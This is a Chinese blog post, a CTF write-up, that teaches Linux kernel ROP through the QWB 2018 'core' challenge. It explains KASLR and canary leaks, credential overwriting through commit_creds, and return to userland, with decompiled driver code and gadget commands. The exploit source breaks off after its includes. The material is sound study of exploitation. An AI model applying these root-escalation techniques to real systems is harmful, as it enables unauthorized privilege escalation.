

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/128.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="yyyffff">
  <meta name="keywords" content="">
  
    <meta name="description" content="kernel rop前言内核 ROP 与普通的 ROP 无区别，只不过 system(&#x2F;bin&#x2F;sh) 变为了 commit_cred(&amp;init_cred) 或者 commit_creds(prepare_kernel(NULL))，当在内核中执行这样的代码，当前线程的 cred 结构体便会变为 init 进程的 cred 的拷贝，也就获得了 root 权限 关于 &amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="kernel expolitation">
<meta property="og:url" content="http://yyyffff.github.io/2025/08/26/kernel%20expolitation/index.html">
<meta property="og:site_name" content="yyyffff&#39;s blog">
<meta property="og:description" content="kernel rop前言内核 ROP 与普通的 ROP 无区别，只不过 system(&#x2F;bin&#x2F;sh) 变为了 commit_cred(&amp;init_cred) 或者 commit_creds(prepare_kernel(NULL))，当在内核中执行这样的代码，当前线程的 cred 结构体便会变为 init 进程的 cred 的拷贝，也就获得了 root 权限 关于 &amp;">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-08-26T15:34:18.000Z">
<meta property="article:modified_time" content="2025-09-26T03:57:21.300Z">
<meta property="article:author" content="yyyffff">
<meta property="article:tag" content="kernel">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>kernel expolitation - yyyffff&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"yyyffff.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"2bkS2AvQTqNk4TIsyxh4ew9q-gzGzoHsz","app_key":"GfRH0zMaM1USTNT6w25DTqu8","server_url":"https://2bks2avq.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>yyyffff</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="kernel expolitation"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-08-26 23:34" pubdate>
          2025年8月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">kernel expolitation</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="kernel-rop"><a href="#kernel-rop" class="headerlink" title="kernel rop"></a>kernel rop</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>内核 ROP 与普通的 ROP 无区别，只不过 system(&#x2F;bin&#x2F;sh) 变为了 commit_cred(&amp;init_cred) 或者 commit_creds(prepare_kernel(NULL))，当在内核中执行这样的代码，当前线程的 cred 结构体便会变为 init 进程的 cred 的拷贝，也就获得了 root 权限</p>
<p>关于 &amp;init_cred</p>
<p>是一个全局变量，类似</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">const</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">cred</span> <span class="hljs-title">init_cred</span> =</span> &#123;<br>    .usage     = ATOMIC_INIT(<span class="hljs-number">4</span>),<br>    .uid       = GLOBAL_ROOT_UID,   <span class="hljs-comment">// = 0</span><br>    .gid       = GLOBAL_ROOT_GID,   <span class="hljs-comment">// = 0</span><br>    .euid      = GLOBAL_ROOT_UID,   <span class="hljs-comment">// = 0</span><br>    .egid      = GLOBAL_ROOT_GID,   <span class="hljs-comment">// = 0</span><br>    .suid      = GLOBAL_ROOT_UID,   <span class="hljs-comment">// = 0</span><br>    .sgid      = GLOBAL_ROOT_GID,   <span class="hljs-comment">// = 0</span><br>    .fsuid     = GLOBAL_ROOT_UID,   <span class="hljs-comment">// = 0</span><br>    .fsgid     = GLOBAL_ROOT_GID,   <span class="hljs-comment">// = 0</span><br>    ...<br>&#125;;<br><br></code></pre></td></tr></table></figure>

<p>表示 root 权限</p>
<p>prepare_kernel(0) 会新建一个和 root 的 cred ，类似复制 init_cred</p>
<h2 id="状态保存"><a href="#状态保存" class="headerlink" title="状态保存"></a>状态保存</h2><p>我们在内核中完成提权后，最终仍然要回到用户态以获得一个 root 权限的 shell，所以当我们脚本进入内核态时需要手动模拟保存寄存器</p>
<p>通常情况下我们都是保存在自己的变量之中的，以便于构造 rop 链</p>
<p>这里 wiki 给出了一个模板，intel 风格，需要指定参数 -masm&#x3D;intel</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">size_t</span> user_cs, user_ss, user_rflags, user_sp;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">save_status</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span><br>&#123;<br>    <span class="hljs-keyword">asm</span> <span class="hljs-title function_">volatile</span> <span class="hljs-params">(</span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_cs, cs;&quot;</span>  <span class="hljs-comment">//这里 user_cs 等都是我们自己定义的变量</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_ss, ss;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;mov user_sp, rsp;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;pushf;&quot;</span></span><br><span class="hljs-params">        <span class="hljs-string">&quot;pop user_rflags;&quot;</span></span><br><span class="hljs-params">    )</span>;<br><br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[*] Status has been saved.&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="返回用户态"><a href="#返回用户态" class="headerlink" title="返回用户态"></a>返回用户态</h2><p>返回用户态流程</p>
<ul>
<li>swapgs 恢复 GS 寄存器</li>
<li>sysretq 或者 iretq 恢复到用户空间</li>
</ul>
<p>我们只要在内核中找到相应的 gadget 并执行 swapgs;iretq 就可以返回到用户态</p>
<p>通常来说，rop 链应如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash">↓   swapgs<br>    iretq<br>    user_shell_addr<br>    user_cs<br>    user_eflags //64bit user_rflags<br>    user_sp<br>    user_ss<br></code></pre></td></tr></table></figure>

<p>有时候会引发栈平衡的问题，这时候可以调整 sp 寄存器的值来通过（加减8）</p>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="强网杯-2018-core"><a href="#强网杯-2018-core" class="headerlink" title="强网杯 2018 - core"></a>强网杯 2018 - core</h3><h4 id="前言-1"><a href="#前言-1" class="headerlink" title="前言"></a>前言</h4><p>题目给了 bzImage，core.cpio，start.sh，以及带符号表的 vmlinux</p>
<p>vmlinux 是未经压缩的 kernel ELF 文件，我们可以从中找到一些gadget，可以用 ROPgadget 或 ropper 对齐进行提取，当然直接用 ropper 分析也是可以的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">ropper --file ./vmlinux --nocolor &gt; gadget_ropper.txt<br>ROPgadget --binary ./vmlinux &gt; gadget_ropgadget.txt<br></code></pre></td></tr></table></figure>

<p>如果没有给 vmlinux，可以用 extract-vmlinux 提取</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./extract-vmlinux ./bzImage &gt; vmlinux<br></code></pre></td></tr></table></figure>

<h4 id="start-sh"><a href="#start-sh" class="headerlink" title="start.sh"></a>start.sh</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">qemu-system-x86_64 \<br>-m 64M \<br>-kernel ./bzImage \<br>-initrd  ./core.cpio \<br>-append <span class="hljs-string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr&quot;</span> \<br>-s  \<br>-netdev user,<span class="hljs-built_in">id</span>=t0, -device e1000,netdev=t0,<span class="hljs-built_in">id</span>=nic0 \<br>-nographic  \<br></code></pre></td></tr></table></figure>

<p>可以看到开了 kaslr，顺便复习一下 kaslr</p>
<h4 id="kaslr"><a href="#kaslr" class="headerlink" title="kaslr"></a>kaslr</h4><p>内核的地址随机化保护，会给内核加载地址加上随机偏移，但偏移量同一，所有函数，全局变量，gadget都是这个偏移</p>
<p>所以我们需要先泄露出某个函数的真实地址，减去其未启用 kaslr 时的地址，就可以得到偏移</p>
<h4 id="init"><a href="#init" class="headerlink" title="init"></a>init</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br>mount -t proc proc /proc<br>mount -t sysfs sysfs /sys<br>mount -t devtmpfs none /dev<br>/sbin/mdev -s<br><span class="hljs-built_in">mkdir</span> -p /dev/pts<br>mount -vt devpts -o gid=4,mode=620 none /dev/pts<br><span class="hljs-built_in">chmod</span> 666 /dev/ptmx<br><span class="hljs-built_in">cat</span> /proc/kallsyms &gt; /tmp/kallsyms<br><span class="hljs-built_in">echo</span> 1 &gt; /proc/sys/kernel/kptr_restrict <span class="hljs-comment"># kptr_restrict设为1，这样我们就不可以通过/proc/kallsyms直接读取函数的地址了</span><br><span class="hljs-built_in">echo</span> 1 &gt; /proc/sys/kernel/dmesg_restrict <span class="hljs-comment"># 该值设为1表示不可通过dmesg查看kernel信息了</span><br>ifconfig eth0 up<br>udhcpc -i eth0<br>ifconfig eth0 10.0.2.15 netmask 255.255.255.0<br>route add default gw 10.0.2.2 <br>insmod /core.ko<br><br>poweroff -d 120 -f &amp;<br>setsid /bin/cttyhack setuidgid 1000 /bin/sh<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;sh end!\n&#x27;</span><br>umount /proc<br>umount /sys<br><br>poweroff -d 0  -f<br></code></pre></td></tr></table></figure>

<p>第 9 行将符号表导出到 &#x2F;tmp&#x2F;kallsyms，这样普通用户也可以读到</p>
<p>第 18 行表示 120 秒后强制关机，可以去掉，无影响</p>
<h4 id="IDA"><a href="#IDA" class="headerlink" title="IDA"></a>IDA</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 <span class="hljs-title function_">init_module</span><span class="hljs-params">()</span><br>&#123;<br>  core_proc = proc_create(<span class="hljs-string">&quot;core&quot;</span>, <span class="hljs-number">438LL</span>, <span class="hljs-number">0LL</span>, &amp;core_fops);<br>  printk(&amp;unk_2DE);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;                                   <span class="hljs-comment">// 返回0表示加载成功</span><br>&#125;<br></code></pre></td></tr></table></figure>

<h5 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">unsigned</span> __int64 __fastcall <span class="hljs-title function_">core_read</span><span class="hljs-params">(__int64 a1)</span><br>&#123;<br>  <span class="hljs-type">char</span> *v2; <span class="hljs-comment">// rdi</span><br>  __int64 i; <span class="hljs-comment">// rcx</span><br>  <span class="hljs-type">unsigned</span> __int64 result; <span class="hljs-comment">// rax</span><br>  <span class="hljs-type">char</span> v5[<span class="hljs-number">64</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-50h] BYREF</span><br>  <span class="hljs-type">unsigned</span> __int64 v6; <span class="hljs-comment">// [rsp+40h] [rbp-10h] 这里canary在rbp-0x10的位置，可以推测出底下off要求偏移为64来泄露canary</span><br><br>  v6 = __readgsqword(<span class="hljs-number">0x28u</span>);<br>  printk(&amp;unk_25B);<br>  printk(&amp;unk_275);<br>  v2 = v5;<br>  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">16LL</span>; i; --i )<br>  &#123;<br>    *(_DWORD *)v2 = <span class="hljs-number">0</span>;<br>    v2 += <span class="hljs-number">4</span>;<br>  &#125;<br>  <span class="hljs-built_in">strcpy</span>(v5, <span class="hljs-string">&quot;Welcome to the QWB CTF challenge.\n&quot;</span>);<br>  result = copy_to_user(a1, &amp;v5[off], <span class="hljs-number">64LL</span>);    <span class="hljs-comment">// 将得到的字符串传到a1给用户</span><br>  <span class="hljs-keyword">if</span> ( !result )<br>    <span class="hljs-keyword">return</span> __readgsqword(<span class="hljs-number">0x28u</span>) ^ v6;<br>  __asm &#123; swapgs &#125;<br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<h5 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">core_write</span><span class="hljs-params">(__int64 a1, __int64 a2, <span class="hljs-type">unsigned</span> __int64 a3)</span><br>&#123;<br>  printk(&amp;unk_215);<br>  <span class="hljs-keyword">if</span> ( a3 &lt;= <span class="hljs-number">0x800</span> &amp;&amp; !copy_from_user(&amp;name, a2, a3) )<span class="hljs-comment">//将输入的传到name变量里</span><br>    <span class="hljs-keyword">return</span> (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)a3;<br>  printk(&amp;unk_230);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0xFFFFFFF2L</span>L;<br>&#125;<br></code></pre></td></tr></table></figure>

<h5 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">core_copy_func</span><span class="hljs-params">(__int64 a1)</span><br>&#123;<br>  __int64 result; <span class="hljs-comment">// rax</span><br>  _QWORD v2[<span class="hljs-number">10</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-50h] BYREF</span><br><br>  v2[<span class="hljs-number">8</span>] = __readgsqword(<span class="hljs-number">0x28u</span>);<br>  printk(&amp;unk_215);<br>  <span class="hljs-keyword">if</span> ( a1 &gt; <span class="hljs-number">63</span> )<br>  &#123;<br>    printk(&amp;unk_2A1);<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0xFFFFFFFFL</span>L;<br>  &#125;<br>  <span class="hljs-keyword">else</span><br>  &#123;<br>    result = <span class="hljs-number">0LL</span>;<br>    qmemcpy(v2, &amp;name, (<span class="hljs-type">unsigned</span> __int16)a1);   <span class="hljs-comment">// 整数溢出，不过该函数不会0截断，我们不可以输入-1，否则拷贝的数据太多了貌似会出错</span><br>  &#125;<br>  <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<h5 id="core-ioctl"><a href="#core-ioctl" class="headerlink" title="core_ioctl"></a>core_ioctl</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">core_ioctl</span><span class="hljs-params">(__int64 a1, <span class="hljs-type">int</span> a2, __int64 a3)</span><br>&#123;<br>  <span class="hljs-keyword">switch</span> ( a2 )<br>  &#123;<br>    <span class="hljs-keyword">case</span> <span class="hljs-number">0x6677889B</span>:<br>      core_read(a3);<br>      <span class="hljs-keyword">break</span>;<br>    <span class="hljs-keyword">case</span> <span class="hljs-number">0x6677889C</span>:<span class="hljs-comment">//更改偏移</span><br>      printk(&amp;unk_2CD);<br>      off = a3;<br>      <span class="hljs-keyword">break</span>;<br>    <span class="hljs-keyword">case</span> <span class="hljs-number">0x6677889A</span>:<br>      printk(&amp;unk_2B3);<br>      core_copy_func(a3);<br>      <span class="hljs-keyword">break</span>;<br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>&#125;<br></code></pre></td></tr></table></figure>



<h4 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h4><ul>
<li>首先肯定是要gadgets，这里不能用带符号表的 vmlinux，而是要用 core.cpio 解包出来的 vmlinux，在这里卡了好久&#x2F;(ㄒoㄒ)&#x2F;~~。</li>
<li>kernel_base 也需要，可通过 checksec 得到</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash">yyyffff@yyyffff-virtual-machine:~/kernel/give_to_player/core$ checksec vmlinux<br>[*] <span class="hljs-string">&#x27;/home/yyyffff/kernel/give_to_player/core/vmlinux&#x27;</span><br>    Arch:       amd64-64-little<br>    Version:    4.15.8<br>    RELRO:      No RELRO<br>    Stack:      Canary found<br>    NX:         NX unknown - GNU_STACK missing<br>    PIE:        No PIE (0xffffffff81000000)<br>    Stack:      Executable<br>    RWX:        Has RWX segments<br>    Stripped:   No<br></code></pre></td></tr></table></figure>

<ul>
<li>要求 kaslr 的偏移，要知道运行时真实地址和未加 kaslr 的基址，前者可以通过读取 &#x2F;tmp&#x2F;kallsyms 得到，后者可以通过 vmlinux 得到</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">yyyffff@yyyffff-virtual-machine:~/kernel/give_to_player/core$ nm -n vmlinux | grep commit_creds<br>ffffffff8109c8e0 T commit_creds<br></code></pre></td></tr></table></figure>

<p>（nm 是查看符号表的工具，可列出函数、全局变量等符号及它们地址和类型 -n 表示按符号地址从小到大排序 grep 表示过滤出名字包含 commit_creds 的行）</p>
<ul>
<li>canary 也要泄露出，可以通过 IDA 存到了 [rbp-0x10] 的位置，可以得出偏移为 64</li>
<li>commit_creds 和 prepare_kernel_cred 地址也要泄露，我们可以通过读取 &#x2F;tmp&#x2F;kallsyms 来获得</li>
</ul>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>（参考wiki的）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-meta">#<span 